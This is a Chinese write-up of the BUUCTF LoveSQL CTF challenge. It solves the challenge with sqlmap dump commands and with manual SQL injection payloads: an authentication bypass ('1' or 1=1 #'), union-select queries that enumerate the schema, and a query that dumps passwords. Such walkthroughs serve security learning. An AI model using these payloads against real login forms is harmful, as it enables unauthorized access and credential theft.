2025.1.16——五、LoveSQL1 sqlmap文件类|万能密码

题目来源:BUUCTF 极客大挑战 2019LoveSQL 1

目录

一、打开靶机,分析信息

二、sqlmap解题------文件类

[step 1:通过url进行爆破](#step 1:通过url进行爆破)

[step 2:抓包并将信息保存为文件进行爆破数据库](#step 2:抓包并将信息保存为文件进行爆破数据库)

[step 3:爆表](#step 3:爆表)

[step 4:爆列的所有信息](#step 4:爆列的所有信息)

三、手工注入爆破------万能密码

[step 1:万能密码注入](#step 1:万能密码注入)

[step 2:判断字段数](#step 2:判断字段数)

[step 3:爆数据库](#step 3:爆数据库)

[step 4:爆表名](#step 4:爆表名)

[step 5:爆列名](#step 5:爆列名)

[step 6:爆具体数据](#step 6:爆具体数据)

四、小结


一、打开靶机,分析信息

题目提示这道题是sql注入

查看源码,获取信息:①可尝试sqlmap;②可以手工注入

二、sqlmap解题------文件类

step 1:通过url进行爆破

直接复制url,使用 -u 进行爆破,但是总感觉哪里怪怪的,应该是传参的内容不太合适,所以改用文件方式进行爆破

step 2:抓包并将信息保存为文件进行爆破数据库

bp抓包后将信息保存在桌面的1.txt文件中,用-r指令进行爆破

口令:

复制代码
python sqlmap.py -r "C:\Users\AR439\Desktop\1.txt" -dbs

得到5个数据库名,geek数据库最可疑,进行爆破

step 3:爆表

复制代码
python sqlmap.py -r "C:\Users\AR439\Desktop\1.txt" -p username --batch -D geek --tables

得到两个表,其中 l0ve1ysq1列 最可疑

step 4:爆列的所有信息

复制代码
python sqlmap.py -r "C:\Users\AR439\Desktop\1.txt" -p username --batch -D geek -T l0ve1ysq1 --dump

得到flag

三、手工注入爆破------万能密码

step 1:万能密码注入

username:1' or 1=1 # password:随便

注入点正确

step 2:判断字段数

%23是url编码后的#

sql 复制代码
1' order by 3 %23
sql 复制代码
1' order by 4 %23

所以可以得到字段数为2

step 3:爆数据库

这里可以加一步判断回显点

sql 复制代码
1' union select 1,2,3%23

爆出数据库

sql 复制代码
1' union select database(),database(),database()%23

得到数据库名geek

step 4:爆表名

sql 复制代码
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'

step 5:爆列名

sql 复制代码
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23

step 6:爆具体数据

sql 复制代码
1' union select 1,2,password from geek.l0ve1ysq1 %23

得到了我们不需要的东西,所以应该一次性把数据全部输出

sql 复制代码
1' union select 1,2,group_concat(password) from geek.l0ve1ysq1 %23

太长了,直接看源代码,得到flag为flag{8e405a18-97b4-4393-9991-ec7de04d993c}

四、小结

拿到题先寻找注入点,而后判断注入类型,尝试用万能密码登陆,sqlmap的使用很重要

相关推荐
ylscode9 小时前
OpenSSH 10.4 正式发布:后量子加密落地,多项高危漏洞得到修复
网络·安全·网络安全
阿成学长_Cain10 小时前
Linux ipcs 命令超全详解:查看共享内存 / 消息队列 / 信号量,IPC 运维必备
linux·运维·服务器·网络·数据库
一嘴一个橘子11 小时前
mysql 创建表
mysql
OceanBase数据库官方博客12 小时前
OceanBase AI 时代,数据库的变与不变(技术解析与实践)
数据库·人工智能·oceanbase
阿成学长_Cain13 小时前
Linux dirs命令详解|Bash目录堆栈管理快速切换目录实战教程
linux·运维·前端·数据库
ywl47081208714 小时前
Mysql 平衡二叉树、红黑树、B树、B+树区别以及应用场景(五)
数据库·b树·mysql
IvorySQL14 小时前
IvorySQL Agent 探索与实践
数据库·人工智能·postgresql·oracle·ivorysql
作陪15 小时前
小白也能看懂的 SQL 零基础教程:从关系模型到事务全解
mysql
SelectDB15 小时前
美团数十 PB 规模 Apache Doris 实践:从统一 OLAP 到 AI-Native 数据基座
大数据·数据库·性能优化
星幻元宇VR15 小时前
公共安全实训展厅设备【人防知识学习系统】
科技·学习·安全